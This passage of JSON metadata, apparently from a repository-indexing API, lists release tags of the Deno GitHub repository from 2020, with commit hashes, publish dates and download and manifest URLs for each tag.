tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url